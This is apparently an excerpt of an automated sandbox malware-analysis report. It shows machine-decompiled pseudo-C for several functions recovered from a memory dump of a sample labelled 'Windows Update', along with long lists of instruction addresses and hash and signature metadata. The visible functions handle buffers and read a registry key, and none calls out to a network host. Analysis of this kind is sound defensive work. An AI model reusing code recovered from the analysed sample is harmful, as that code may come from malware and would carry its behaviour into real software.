												if(_t205 == 0) {
													__eflags = _t216 - 4;
													if(_t216 >= 4) {
														_t114 = _t230 + 0xc;
														 *_t114 =  *(_t230 + 0xc) & 0xffff7fff;
														__eflags =  *_t114;
													}
												}
												_push(_v48);
												_t176 = E00059197(_t230, 0x47814c,  *((intOrPtr*)( *((intOrPtr*)(_t230 + 8)) + _t228)));
												_t217 =  &_v76;
												 *(_v52 + 0xf0) = 0;
												_t206 = E000253F7(_v52, _t176, 0x43c930,  &_v76, 0);
												_t179 = _v52;
												 *((intOrPtr*)(_t179 + 0xf0)) =  *((intOrPtr*)(_t230 + 0xf0));
												_t230 = _t179;
												__eflags = _t206;
												_t202 =  ==  ? _v64 : _t206;
												E0004E6D7(_t230, _t176);
												_t238 = _t237 + 0x2c;
												__eflags = _t202;
												if(_t202 == 0) {
													E000470E7(_t230, _v40);
													_t238 = _t238 + 8;
												}
												__eflags =  *((char*)(_t230 + 0x1e));
												if( *((char*)(_t230 + 0x1e)) == 0) {
													__eflags = _t202;
													if(_t202 == 0) {
														goto L55;
													} else {
														goto L54;
													}
												} else {
													_t202 = 7;
													E0005E577(_t217, _t230, 0);
													_t238 = _t238 + 8;
													L54:
													__eflags =  *(_t230 + 0xc) & 0x00040000;
													if(( *(_t230 + 0xc) & 0x00040000) == 0) {
														L19:
														_t228 = _v32;
													} else {
														L55:
														_t228 = _v32;
														 *( *((intOrPtr*)( *((intOrPtr*)(_t230 + 8)) + _t228 + 0xc)) + 0x3a) =  *( *((intOrPtr*)( *((intOrPtr*)(_t230 + 8)) + _t228 + 0xc)) + 0x3a) | 0x00000001;
														_t202 = 0;
													}
													goto L20;
												}
											} else {
												_push(0x478134);
												L34:
												_push(_t230);
												_push(_v56);
												E00061157(__eflags);
												_t238 = _t237 + 0xc;
												_t202 = 1;
												goto L20;
											}
										}
									}
								}
								goto L58;
							}
							L20:
							E00049317(_v44);
							E00027247(_v44);
							_t225 =  *(_v36 + _t228 + 4);
							__eflags =  *((char*)(_t225 + 9));
							if( *((char*)(_t225 + 9)) != 0) {
								_t60 = _t225 + 0xc;
								 *_t60 =  *(_t225 + 0xc) - 1;
								__eflags =  *_t60;
								if( *_t60 == 0) {
									_t163 =  *( *((intOrPtr*)(_t225 + 4)) + 0x30);
									__eflags = _t163;
									if(_t163 != 0) {
										 *0x481858(_t163);
									}
									 *((char*)(_t225 + 0xa)) = 0;
								}
							}
							goto L25;
						}
						L58:
						__eflags = _v8 ^ _t232;
						return E000772F2(_t202, _t202, _v8 ^ _t232, _t224, _t225, _t230);
					} else {
						if(_t225 == 1) {
							 *( *((intOrPtr*)(_t203 + 0x1c)) + 0x3a) =  *( *((intOrPtr*)(_t203 + 0x1c)) + 0x3a) | _t225;
						}
						return E000772F2(0, _t203, _v8 ^ _t232, _t224, _t225, _t230);
					}
				}
			}
























































                                                                                                                    0x00057274
                                                                                                                    0x00057277
                                                                                                                    0x0005727c
                                                                                                                    0x00057280
                                                                                                                    0x00057283
                                                                                                                    0x00057286
                                                                                                                    0x00057289
                                                                                                                    0x0005728f
                                                                                                                    0x0005729d
                                                                                                                    0x000572a2
                                                                                                                    0x00057291
                                                                                                                    0x00057291
                                                                                                                    0x00057296
                                                                                                                    0x00057296
                                                                                                                    0x000572a7
                                                                                                                    0x000572aa
                                                                                                                    0x000572b6
                                                                                                                    0x000572b9
                                                                                                                    0x000572bc
                                                                                                                    0x000572c3
                                                                                                                    0x000572ca
                                                                                                                    0x000572cd
                                                                                                                    0x000572d0
                                                                                                                    0x000572d7
                                                                                                                    0x000572da
                                                                                                                    0x000572df
                                                                                                                    0x000572e2
                                                                                                                    0x000572e7
                                                                                                                    0x00057435
                                                                                                                    0x00057435
                                                                                                                    0x00057438
                                                                                                                    0x00000000
                                                                                                                    0x0005743e
                                                                                                                    0x0005743e
                                                                                                                    0x00057444
                                                                                                                    0x00000000
                                                                                                                    0x0005744a
                                                                                                                    0x00057444
                                                                                                                    0x00000000
                                                                                                                    0x000572ed
                                                                                                                    0x000572f5
                                                                                                                    0x000572ff
                                                                                                                    0x00057304
                                                                                                                    0x00057309
                                                                                                                    0x0005730b
                                                                                                                    0x0005730b
                                                                                                                    0x0005730f
                                                                                                                    0x00057315
                                                                                                                    0x0005731d
                                                                                                                    0x00057343
                                                                                                                    0x00057348
                                                                                                                    0x0005734b
                                                                                                                    0x0005734e
                                                                                                                    0x00057350
                                                                                                                    0x000575ff
                                                                                                                    0x00057604
                                                                                                                    0x00057604
                                                                                                                    0x00057356
                                                                                                                    0x0005735e
                                                                                                                    0x0005736a
                                                                                                                    0x00057381
                                                                                                                    0x00057385
                                                                                                                    0x00057388
                                                                                                                    0x0005738b
                                                                                                                    0x0005738e
                                                                                                                    0x00057390
                                                                                                                    0x00057392
                                                                                                                    0x000573c7
                                                                                                                    0x000573c9
                                                                                                                    0x000573ce
                                                                                                                    0x000573d1
                                                                                                                    0x000573de
                                                                                                                    0x000573de
                                                                                                                    0x000573d3
                                                                                                                    0x000573d3
                                                                                                                    0x000573da
                                                                                                                    0x000573dc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000573dc
                                                                                                                    0x000573ed
                                                                                                                    0x000573f2
                                                                                                                    0x00000000
                                                                                                                    0x00057394
                                                                                                                    0x00057394
                                                                                                                    0x00057397
                                                                                                                    0x0005739a
                                                                                                                    0x0005739a
                                                                                                                    0x0005739d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000573aa
                                                                                                                    0x000573b5
                                                                                                                    0x000573ba
                                                                                                                    0x000573bd
                                                                                                                    0x000573c0
                                                                                                                    0x000573c3
                                                                                                                    0x000573c5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000573c5
                                                                                                                    0x0005744f
                                                                                                                    0x00057451
                                                                                                                    0x00000000
                                                                                                                    0x00057457
                                                                                                                    0x00057457
                                                                                                                    0x0005745a
                                                                                                                    0x00057464
                                                                                                                    0x00057467
                                                                                                                    0x00057469
                                                                                                                    0x0005746c
                                                                                                                    0x0005746e
                                                                                                                    0x000574ce
                                                                                                                    0x000574d2
                                                                                                                    0x000574d2
                                                                                                                    0x000574d2
                                                                                                                    0x00000000
                                                                                                                    0x00057470
                                                                                                                    0x00057470
                                                                                                                    0x00057472
                                                                                                                    0x000574ac
                                                                                                                    0x000574ae
                                                                                                                    0x00000000
                                                                                                                    0x000574b0
                                                                                                                    0x000574b0
                                                                                                                    0x00000000
                                                                                                                    0x000574b0
                                                                                                                    0x00057474
                                                                                                                    0x0005747f
                                                                                                                    0x0005748f
                                                                                                                    0x00057492
                                                                                                                    0x00057497
                                                                                                                    0x0005749a
                                                                                                                    0x0005749d
                                                                                                                    0x000574d7
                                                                                                                    0x000574e4
                                                                                                                    0x000574e7
                                                                                                                    0x000574eb
                                                                                                                    0x000574ef
                                                                                                                    0x000574f1
                                                                                                                    0x000574f1
                                                                                                                    0x000574f4
                                                                                                                    0x000574f6
                                                                                                                    0x000574ff
                                                                                                                    0x00057501
                                                                                                                    0x00057501
                                                                                                                    0x000574f8
                                                                                                                    0x000574f8
                                                                                                                    0x000574f8
                                                                                                                    0x00057503
                                                                                                                    0x00057511
                                                                                                                    0x00057516
                                                                                                                    0x00057519
                                                                                                                    0x00057519
                                                                                                                    0x00057520
                                                                                                                    0x00057523
                                                                                                                    0x00057526
                                                                                                                    0x0005752a
                                                                                                                    0x0005752e
                                                                                                                    0x00057530
                                                                                                                    0x00057530
                                                                                                                    0x00057538
                                                                                                                    0x0005753c
                                                                                                                    0x00057548
                                                                                                                    0x0005754a
                                                                                                                    0x0005754c
                                                                                                                    0x0005754f
                                                                                                                    0x00057551
                                                                                                                    0x00057551
                                                                                                                    0x00057551
                                                                                                                    0x00057551
                                                                                                                    0x0005754f
                                                                                                                    0x00057558
                                                                                                                    0x00057567
                                                                                                                    0x00057574
                                                                                                                    0x00057584
                                                                                                                    0x00057593
                                                                                                                    0x00057595
                                                                                                                    0x00057599
                                                                                                                    0x0005759f
                                                                                                                    0x000575a1
                                                                                                                    0x000575a3
                                                                                                                    0x000575a8
                                                                                                                    0x000575ad
                                                                                                                    0x000575b0
                                                                                                                    0x000575b2
                                                                                                                    0x000575b8
                                                                                                                    0x000575bd
                                                                                                                    0x000575bd
                                                                                                                    0x000575c0
                                                                                                                    0x000575c4
                                                                                                                    0x000575d8
                                                                                                                    0x000575da
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x000575c6
                                                                                                                    0x000575c9
                                                                                                                    0x000575ce
                                                                                                                    0x000575d3
                                                                                                                    0x000575dc
                                                                                                                    0x000575dc
                                                                                                                    0x000575e3
                                                                                                                    0x000573f5
                                                                                                                    0x000573f5
                                                                                                                    0x000575e9
                                                                                                                    0x000575e9
                                                                                                                    0x000575ec
                                                                                                                    0x000575f3
                                                                                                                    0x000575f8
                                                                                                                    0x000575f8
                                                                                                                    0x00000000
                                                                                                                    0x000575e3
                                                                                                                    0x0005753e
                                                                                                                    0x0005753e
                                                                                                                    0x000574b5
                                                                                                                    0x000574b5
                                                                                                                    0x000574b6
                                                                                                                    0x000574b9
                                                                                                                    0x000574be
                                                                                                                    0x000574c1
                                                                                                                    0x00000000
                                                                                                                    0x000574c1
                                                                                                                    0x0005753c
                                                                                                                    0x00057472
                                                                                                                    0x0005746e
                                                                                                                    0x00000000
                                                                                                                    0x00057451
                                                                                                                    0x000573f8
                                                                                                                    0x000573fb
                                                                                                                    0x00057403
                                                                                                                    0x0005740e
                                                                                                                    0x00057412
                                                                                                                    0x00057416
                                                                                                                    0x00057418
                                                                                                                    0x00057418
                                                                                                                    0x00057418
                                                                                                                    0x0005741b
                                                                                                                    0x00057420
                                                                                                                    0x00057423
                                                                                                                    0x00057425
                                                                                                                    0x00057428
                                                                                                                    0x0005742e
                                                                                                                    0x00057431
                                                                                                                    0x00057431
                                                                                                                    0x0005741b
                                                                                                                    0x00000000
                                                                                                                    0x00057416
                                                                                                                    0x00057608
                                                                                                                    0x0005760f
                                                                                                                    0x0005761a
                                                                                                                    0x0005731f
                                                                                                                    0x00057322
                                                                                                                    0x00057327
                                                                                                                    0x00057327
                                                                                                                    0x0005733d
                                                                                                                    0x0005733d
                                                                                                                    0x0005731d

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset
                                                                                                                    • String ID: ($G$DXG
                                                                                                                    • API String ID: 2102423945-3586749926
                                                                                                                    • Opcode ID: 17224fdaf8242e8bc02be2df51ef3be814f63876267d998fec0f9f1e89d319ab
                                                                                                                    • Instruction ID: 332c39b438de32e9088bd57e3f64b4b13ebe54edee82ee35b1ca0f4ff7937ef9
                                                                                                                    • Opcode Fuzzy Hash: 17224fdaf8242e8bc02be2df51ef3be814f63876267d998fec0f9f1e89d319ab
                                                                                                                    • Instruction Fuzzy Hash: 77C1D1B0A04245AFDB20CF99D881FEEBBF5EF04315F048069ED08AB652D775E948DB94
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00036D37 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 284COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 98%
                                                                                                                    			E00036D37(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, unsigned int _a16, intOrPtr _a20, intOrPtr _a24, unsigned int _a28, unsigned int _a32, signed int* _a36) {
				unsigned int _v8;
				intOrPtr _v12;
				unsigned int _v16;
				unsigned int _v20;
				void* _v24;
				char _v28;
				signed int _v32;
				signed short _v34;
				signed short _v36;
				signed short _v38;
				char _v64;
				void* __edi;
				intOrPtr _t124;
				intOrPtr _t126;
				intOrPtr _t132;
				intOrPtr _t138;
				intOrPtr _t148;
				void* _t166;
				void* _t172;
				unsigned int _t173;
				unsigned int _t176;
				intOrPtr _t177;
				intOrPtr _t179;
				intOrPtr _t180;
				unsigned int _t181;
				intOrPtr _t183;
				intOrPtr _t184;
				intOrPtr _t185;
				intOrPtr* _t186;
				void* _t192;
				intOrPtr _t196;
				unsigned int _t198;
				intOrPtr _t205;
				signed int _t206;
				intOrPtr _t207;
				intOrPtr _t208;
				signed int _t212;
				void* _t214;
				void* _t215;
				char* _t217;
				void* _t219;
				void* _t224;
				void* _t225;

				_t205 = _a4;
				_t173 = 0;
				_a4 =  *((intOrPtr*)(_t205 + 0x3c));
				_t214 =  ==  ? 4 : 0;
				_v28 = 0;
				_v16 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(_t205 + 4)) == 0) {
					_a32 = 0;
					_a28 = 0;
				} else {
					asm("cdq");
					_t172 = E0005DC27(_t205, _a8 + _t214, _a32 + _a28, __edx);
					_t224 = _t224 + 0xc;
					_t214 = _t214 + _t172;
				}
				_v8 = _a16;
				_t215 = _t214 + E0005DC27(_t205, _a8 + _t214, _a16, _a20);
				E0004BD27(_t205, _a8,  &_v64);
				_t176 = _a28;
				_t124 = _a32 + _t176;
				_t225 = _t224 + 0x18;
				_a32 = _t124;
				if( *((intOrPtr*)(_t205 + 2)) == _t173) {
					__eflags = _a20 - _t173;
					if(__eflags > 0) {
						L44:
						return 0xb;
					}
					_t196 = _a16;
					if(__eflags >= 0) {
						__eflags = _t196 - 0x7fffffff;
						if(_t196 > 0x7fffffff) {
							goto L44;
						}
					}
					_t177 = _a12;
					_v12 = _t177;
					__eflags = _t177;
					if(_t177 == 0) {
						goto L44;
					} else {
						_t126 = _t124 + _t196;
						__eflags = _t126;
						_a32 = _t126;
					}
				} else {
					_v12 = _a24;
					_v8 = _t176;
					_a28 = _t173;
				}
				_t206 = _v38 & 0x0000ffff;
				 *_a36 = _v34 & 0x0000ffff;
				_t179 = _a8;
				_t128 = _t215 + _t179;
				_t217 = (_v36 & 0x0000ffff) + _t179;
				_t180 = _a32;
				_a8 = _t215 + _t179;
				_v24 = _t217;
				if(_t180 <= 0) {
					L43:
					__eflags = 0;
					return 0;
				} else {
					L11:
					while(1) {
						if(_t206 != 0) {
							L30:
							_t181 = _v8;
							_t219 =  >  ? _t206 : _t180;
							if(_t181 <= 0) {
								E00077C87(_t128, 0, _t219);
							} else {
								_t219 =  >  ? _t181 : _t219;
								E00077337(_t128, _v12, _t219);
							}
							_v12 = _v12 + _t219;
							_t198 = _v8 - _t219;
							_t180 = _a32 - _t219;
							_t128 = _a8 + _t219;
							_t225 = _t225 + 0xc;
							_t206 = _t206 - _t219;
							_a32 = _t180;
							_a8 = _a8 + _t219;
							_v8 = _t198;
							if(_t198 == 0) {
								_v8 = _a28;
								_v12 = _a24;
								_t180 = _a32;
							}
							if(_t180 <= 0) {
								_t183 = _v16;
								__eflags = _t183;
								if(_t183 != 0) {
									_t132 =  *((intOrPtr*)(_t183 + 0x44));
									__eflags = _t132;
									if(_t132 != 0) {
										E0005BA77(_t132);
										L0003EEB7( *((intOrPtr*)(_t132 + 0x10)));
									}
								}
								goto L43;
							} else {
								_t217 = _v24;
								continue;
							}
						} else {
							_t207 = _a4;
							_v32 = _t173;
							if( *((char*)(_t207 + 0x12)) != 0) {
								_t212 = (0x66666667 * ( *(_t207 + 0x16) & 0x0000ffff) >> 0x20 >> 1 >> 0x1f) + (0x66666667 * ( *(_t207 + 0x16) & 0x0000ffff) >> 0x20 >> 1) + 1;
								asm("cdq");
								_t56 =  *0x4818d4 / ( *(_a4 + 0x14) & 0x0000ffff) + 1; // 0x4818d5
								_t192 = _t56;
								do {
									_t173 = _t173 + 1;
									_t57 = _t173 - 2; // -1
									_t166 = _t57 / _t212 * _t212 + 2;
									if(_t166 == _t192) {
										_t166 = _t166 + 1;
									}
								} while (_t166 == _t173 || _t173 == _t192);
								_t207 = _a4;
								_v20 = _t173;
							}
							_t138 = E0002B2E7(_t207,  &_v28,  &_v20, _t173, 0);
							_t173 = _v20;
							_t225 = _t225 + 0x14;
							_t208 = _v28;
							_a8 = _t138;
							if( *((char*)(_t207 + 0x12)) == 0) {
								L25:
								if(_t138 != 0) {
									goto L37;
								} else {
									goto L26;
								}
							} else {
								if(_t138 != 0) {
									L37:
									_t184 = _v16;
									__eflags = _t184;
									if(_t184 == 0) {
										L45:
										return _t138;
									} else {
										_t185 =  *((intOrPtr*)(_t184 + 0x44));
										__eflags = _t185;
										if(_t185 == 0) {
											goto L45;
										} else {
											E0005BA77(_t185);
											L0003EEB7( *((intOrPtr*)(_t185 + 0x10)));
											return _a8;
										}
									}
								} else {
									_t138 = E000416F7(_a4, _t173, (_v32 & 0xffffff00 | _v32 != 0x00000000) + 0x00000003 & 0x000000ff, _v32);
									_t225 = _t225 + 0x10;
									_a8 = _t138;
									if(_t138 == 0) {
										L26:
										 *_t217 = _t173 >> 0x18;
										 *((char*)(_t217 + 1)) = _t173 >> 0x10;
										 *((char*)(_t217 + 2)) = _t173 >> 8;
										_t148 = _v16;
										 *(_t217 + 3) = _t173;
										if(_t148 != 0) {
											_t150 =  *((intOrPtr*)(_t148 + 0x44));
											if( *((intOrPtr*)(_t148 + 0x44)) != 0) {
												E0005BA77(_t150);
												L0003EEB7( *((intOrPtr*)(_t150 + 0x10)));
												_t225 = _t225 + 8;
											}
										}
										_t186 =  *((intOrPtr*)(_t208 + 0x40));
										_v24 = _t186;
										 *_t186 = 0;
										_v16 = _t208;
										_t180 = _a32;
										_t128 =  *((intOrPtr*)(_t208 + 0x40)) + 4;
										_a8 =  *((intOrPtr*)(_t208 + 0x40)) + 4;
										_t206 = ( *(_a4 + 0x16) & 0x0000ffff) - 4;
										goto L30;
									} else {
										if(_t208 != 0) {
											_t188 =  *((intOrPtr*)(_t208 + 0x44));
											if( *((intOrPtr*)(_t208 + 0x44)) != 0) {
												E0005BA77(_t188);
												L0003EEB7( *((intOrPtr*)(_t188 + 0x10)));
												_t217 = _v24;
												_t138 = _a8;
												_t225 = _t225 + 8;
											}
										}
										goto L25;
									}
								}
							}
						}
						goto L46;
					}
				}
				L46:
			}














































                                                                                                                    0x00036d40
                                                                                                                    0x00036d48
                                                                                                                    0x00036d4f
                                                                                                                    0x00036d57
                                                                                                                    0x00036d5a
                                                                                                                    0x00036d61
                                                                                                                    0x00036d64
                                                                                                                    0x00036d6a
                                                                                                                    0x00036d87
                                                                                                                    0x00036d8a
                                                                                                                    0x00036d6c
                                                                                                                    0x00036d72
                                                                                                                    0x00036d7b
                                                                                                                    0x00036d80
                                                                                                                    0x00036d83
                                                                                                                    0x00036d83
                                                                                                                    0x00036d9a
                                                                                                                    0x00036da2
                                                                                                                    0x00036dac
                                                                                                                    0x00036db4
                                                                                                                    0x00036db7
                                                                                                                    0x00036db9
                                                                                                                    0x00036dbc
                                                                                                                    0x00036dc2
                                                                                                                    0x00036dd2
                                                                                                                    0x00036dd5
                                                                                                                    0x00037019
                                                                                                                    0x00000000
                                                                                                                    0x00037019
                                                                                                                    0x00036ddb
                                                                                                                    0x00036dde
                                                                                                                    0x00036de0
                                                                                                                    0x00036de6
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00036de6
                                                                                                                    0x00036dec
                                                                                                                    0x00036def
                                                                                                                    0x00036df2
                                                                                                                    0x00036df4
                                                                                                                    0x00000000
                                                                                                                    0x00036dfa
                                                                                                                    0x00036dfa
                                                                                                                    0x00036dfa
                                                                                                                    0x00036dfc
                                                                                                                    0x00036dfc
                                                                                                                    0x00036dc4
                                                                                                                    0x00036dc7
                                                                                                                    0x00036dca
                                                                                                                    0x00036dcd
                                                                                                                    0x00036dcd
                                                                                                                    0x00036e06
                                                                                                                    0x00036e0a
                                                                                                                    0x00036e0c
                                                                                                                    0x00036e0f
                                                                                                                    0x00036e16
                                                                                                                    0x00036e18
                                                                                                                    0x00036e1b
                                                                                                                    0x00036e1e
                                                                                                                    0x00036e23
                                                                                                                    0x00037012
                                                                                                                    0x00037012
                                                                                                                    0x00037018
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00036e29
                                                                                                                    0x00036e2b
                                                                                                                    0x00036f5f
                                                                                                                    0x00036f63
                                                                                                                    0x00036f66
                                                                                                                    0x00036f6b
                                                                                                                    0x00036f82
                                                                                                                    0x00036f6d
                                                                                                                    0x00036f6f
                                                                                                                    0x00036f77
                                                                                                                    0x00036f77
                                                                                                                    0x00036f90
                                                                                                                    0x00036f93
                                                                                                                    0x00036f95
                                                                                                                    0x00036f97
                                                                                                                    0x00036f99
                                                                                                                    0x00036f9c
                                                                                                                    0x00036f9e
                                                                                                                    0x00036fa1
                                                                                                                    0x00036fa4
                                                                                                                    0x00036fa9
                                                                                                                    0x00036fae
                                                                                                                    0x00036fb4
                                                                                                                    0x00036fb7
                                                                                                                    0x00036fb7
                                                                                                                    0x00036fbc
                                                                                                                    0x00036ff0
                                                                                                                    0x00036ff3
                                                                                                                    0x00036ff5
                                                                                                                    0x00036ff7
                                                                                                                    0x00036ffa
                                                                                                                    0x00036ffc
                                                                                                                    0x00037002
                                                                                                                    0x00037008
                                                                                                                    0x0003700d
                                                                                                                    0x00036ffc
                                                                                                                    0x00000000
                                                                                                                    0x00036fbe
                                                                                                                    0x00036fbe
                                                                                                                    0x00000000
                                                                                                                    0x00036fbe
                                                                                                                    0x00036e31
                                                                                                                    0x00036e31
                                                                                                                    0x00036e34
                                                                                                                    0x00036e3b
                                                                                                                    0x00036e5c
                                                                                                                    0x00036e5e
                                                                                                                    0x00036e61
                                                                                                                    0x00036e61
                                                                                                                    0x00036e67
                                                                                                                    0x00036e67
                                                                                                                    0x00036e6a
                                                                                                                    0x00036e72
                                                                                                                    0x00036e77
                                                                                                                    0x00036e79
                                                                                                                    0x00036e79
                                                                                                                    0x00036e7a
                                                                                                                    0x00036e82
                                                                                                                    0x00036e85
                                                                                                                    0x00036e85
                                                                                                                    0x00036e94
                                                                                                                    0x00036e99
                                                                                                                    0x00036e9c
                                                                                                                    0x00036ea3
                                                                                                                    0x00036ea6
                                                                                                                    0x00036ea9
                                                                                                                    0x00036ef8
                                                                                                                    0x00036efa
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00036eab
                                                                                                                    0x00036ead
                                                                                                                    0x00036fc6
                                                                                                                    0x00036fc6
                                                                                                                    0x00036fc9
                                                                                                                    0x00036fcb
                                                                                                                    0x00037024
                                                                                                                    0x00037024
                                                                                                                    0x00036fcd
                                                                                                                    0x00036fcd
                                                                                                                    0x00036fd0
                                                                                                                    0x00036fd2
                                                                                                                    0x00000000
                                                                                                                    0x00036fd4
                                                                                                                    0x00036fd8
                                                                                                                    0x00036fde
                                                                                                                    0x00036fef
                                                                                                                    0x00036fef
                                                                                                                    0x00036fd2
                                                                                                                    0x00036eb3
                                                                                                                    0x00036ec6
                                                                                                                    0x00036ecb
                                                                                                                    0x00036ece
                                                                                                                    0x00036ed3
                                                                                                                    0x00036f00
                                                                                                                    0x00036f05
                                                                                                                    0x00036f0c
                                                                                                                    0x00036f14
                                                                                                                    0x00036f17
                                                                                                                    0x00036f1a
                                                                                                                    0x00036f1f
                                                                                                                    0x00036f21
                                                                                                                    0x00036f26
                                                                                                                    0x00036f2c
                                                                                                                    0x00036f32
                                                                                                                    0x00036f37
                                                                                                                    0x00036f37
                                                                                                                    0x00036f26
                                                                                                                    0x00036f3a
                                                                                                                    0x00036f3d
                                                                                                                    0x00036f40
                                                                                                                    0x00036f4c
                                                                                                                    0x00036f53
                                                                                                                    0x00036f56
                                                                                                                    0x00036f59
                                                                                                                    0x00036f5c
                                                                                                                    0x00000000
                                                                                                                    0x00036ed5
                                                                                                                    0x00036ed7
                                                                                                                    0x00036ed9
                                                                                                                    0x00036ede
                                                                                                                    0x00036ee4
                                                                                                                    0x00036eea
                                                                                                                    0x00036eef
                                                                                                                    0x00036ef2
                                                                                                                    0x00036ef5
                                                                                                                    0x00036ef5
                                                                                                                    0x00036ede
                                                                                                                    0x00000000
                                                                                                                    0x00036ed7
                                                                                                                    0x00036ed3
                                                                                                                    0x00036ead
                                                                                                                    0x00036ea9
                                                                                                                    0x00000000
                                                                                                                    0x00036e2b
                                                                                                                    0x00036e29
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove_memset
                                                                                                                    • String ID: gfff
                                                                                                                    • API String ID: 3555123492-1553575800
                                                                                                                    • Opcode ID: 2ed781c94647d626ff7c3152cf985861a3023d85d4e9e2f380510339e90e5ab3
                                                                                                                    • Instruction ID: 93ce889b3887370df6b523a48eda229ca925d81a049398d2f6f4f5794ad69431
                                                                                                                    • Opcode Fuzzy Hash: 2ed781c94647d626ff7c3152cf985861a3023d85d4e9e2f380510339e90e5ab3
                                                                                                                    • Instruction Fuzzy Hash: 7DA17EB5A00219ABCB29CF59D8819EEBBB9EF48314F15816DFC09AB341D731ED15CB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0001F577 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 45%
                                                                                                                    			E0001F577(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				char _v267;
				void _v268;
				char _v272;
				char _v528;
				char _v780;
				char _v784;
				char _v788;
				char _v792;
				intOrPtr _v844;
				signed int _v856;
				char _v1048;
				char _v1115;
				char _v1116;
				char _v1372;
				char _v2072;
				signed int _v2076;
				intOrPtr _v2932;
				intOrPtr _v2936;
				intOrPtr _v2940;
				signed int* _v2944;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t89;
				void* _t99;
				intOrPtr _t102;
				void* _t103;
				intOrPtr _t104;
				void* _t105;
				char* _t115;
				signed int _t118;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int _t145;
				char _t146;
				signed int _t151;
				signed int _t156;
				signed int _t161;
				signed int _t166;
				signed int _t178;
				signed int _t183;
				signed int _t188;
				signed int _t193;
				signed int _t196;
				intOrPtr* _t198;
				signed int _t199;
				signed int _t200;
				signed int _t201;
				signed int _t204;
				signed int _t214;
				signed int _t218;
				intOrPtr _t220;
				void* _t222;
				intOrPtr* _t223;
				intOrPtr* _t226;
				intOrPtr* _t228;
				intOrPtr* _t236;
				void* _t238;
				signed int _t242;
				signed int _t246;
				signed int _t248;
				intOrPtr* _t249;
				signed int _t250;
				intOrPtr* _t253;
				int _t255;
				void* _t257;
				signed int _t258;
				void* _t259;
				void* _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				void* _t271;
				intOrPtr* _t272;
				void* _t273;
				void* _t274;
				void* _t276;
				void* _t278;
				void* _t279;
				signed int* _t280;
				void* _t282;
				void* _t283;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				signed int _t301;
				void* _t303;
				intOrPtr* _t304;
				void* _t306;
				signed int _t307;
				signed int _t308;
				void* _t310;
				void* _t311;
				signed int _t312;
				void* _t316;
				void* _t317;
				void* _t318;
				void* _t319;
				void* _t321;
				void* _t322;
				void* _t323;
				void* _t325;

				_v8 =  *0x481f80 ^ _t307;
				_v268 = 0;
				E00077C87( &_v267, 0, 0x103);
				_t311 = _t310 + 0xc;
				_v788 = 0x104;
				_t89 =  &_v780;
				if(_a4 != 0xf) {
					_push(0x470fa8);
				} else {
					_push(0x470f60);
				}
				_push(0x200);
				_push(_t89);
				E00077AF9();
				_t312 = _t311 + 0xc;
				_push( &_v784);
				_push(0x20019);
				_push(0);
				_push( &_v780);
				_push(0x80000002);
				if( *0x470028() != 0) {
					L25:
					__eflags = 0;
					return E000772F2(0, _t222, _v8 ^ _t307, _t257, _t274, _t286);
				} else {
					_t99 =  *0x470024(_v784, 0, 0,  &_v792,  &_v268,  &_v788);
					if(_t99 != 0 || _v788 <= _t99 || _v268 == _t99) {
						 *0x47002c(_v784);
						goto L25;
					} else {
						 *0x47002c(_v784, _t274, _t286);
						if(_v268 == 0x22) {
							_t253 =  &_v268;
							_t18 = _t253 + 1; // 0x23
							_t273 = _t18;
							do {
								_t220 =  *_t253;
								_t253 = _t253 + 1;
							} while (_t220 != 0);
							_t255 = _t253 - _t273 - 1;
							if(_t255 > 0) {
								_t286 =  &_v267;
								memcpy( &_v268, _t286, _t255);
								_t312 = _t312 + 0xc;
								_t274 = _t286 + _t255 + _t255;
							}
						}
						_t226 =  &_v268;
						_t22 = _t226 + 1; // 0x23
						_t258 = _t22;
